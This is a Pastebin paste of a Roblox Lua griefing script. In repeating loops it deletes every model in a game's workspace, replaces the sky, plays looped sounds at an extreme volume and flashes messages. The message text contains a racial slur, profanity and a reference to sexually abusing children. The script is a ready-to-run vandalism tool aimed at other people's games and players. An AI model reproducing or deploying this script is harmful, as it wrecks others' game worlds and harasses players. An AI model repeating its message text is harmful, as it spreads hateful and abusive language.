Advertisement
Guest User

o1

a guest
Jul 16th, 2018
70
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 1.48 KB | None | 0 0
  1. wait(1)
  2. math.randomseed(tick() % 1 * 1e6)
  3. sky = coroutine.create(function()
  4.     while wait(0.3) do
  5.         s = Instance.new("Sky",game.Lighting)
  6.         s.SkyboxBk,s.SkyboxDn,s.SkyboxFt,s.SkyboxLf,s.SkyboxRt,s.SkyboxUp = "rbxassetid://201208408","rbxassetid://201208408","rbxassetid://201208408","rbxassetid://201208408","rbxassetid://201208408","rbxassetid://201208408"
  7.         s.CelestialBodiesShown = false
  8.     end
  9. end)
  10.  
  11.  
  12. del = coroutine.create(function()
  13.     while wait(0.3) do
  14.         for i,v in pairs(workspace:GetChildren()) do
  15.             if v:IsA("Model") then
  16.                 v:Destroy()
  17.             end
  18.         end
  19.     end
  20. end)
  21.  
  22.  
  23. noises = {'rbxassetid://230287740','rbxassetid://271787597','rbxassetid://153752123','rbxassetid://271787503'}
  24.  
  25. sound = coroutine.create(function()
  26.     a = Instance.new("Sound",workspace)
  27.     a.SoundId = "rbxassetid://902601313"
  28.     a.Name = "RAINING MEN"
  29.     a.Volume = 58359
  30.     a.Looped = true
  31.     a:Play()
  32.     while wait(0.2) do
  33.         rainin = workspace:FindFirstChild("RAINING MEN")
  34.         if not rainin then
  35.             a = Instance.new("Sound",workspace)
  36.             a.SoundId = "rbxassetid://141509625"
  37.             a.Name = "RAINING MEN"
  38.             a.Volume = 58359
  39.             a.Looped = true
  40.             a:Play()
  41.         end
  42.     end
  43. end)
  44.  
  45. msg = coroutine.create(function()
  46.     while wait(0.4) do
  47.         msg = Instance.new("Message",workspace)
  48.         msg.Text = "Get toadroasted you bacon-haired bozos. (GO QUIT FUCKED SHIT NIGGER FUCKMYKIDS IS A HACKER)"
  49.         wait(0.4)
  50.         msg:Destroy()
  51.     end
  52. end)
  53.  
  54.  
  55.  
  56. coroutine.resume(sky)
  57. coroutine.resume(del)
  58. coroutine.resume(sound)
  59. coroutine.resume(msg)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement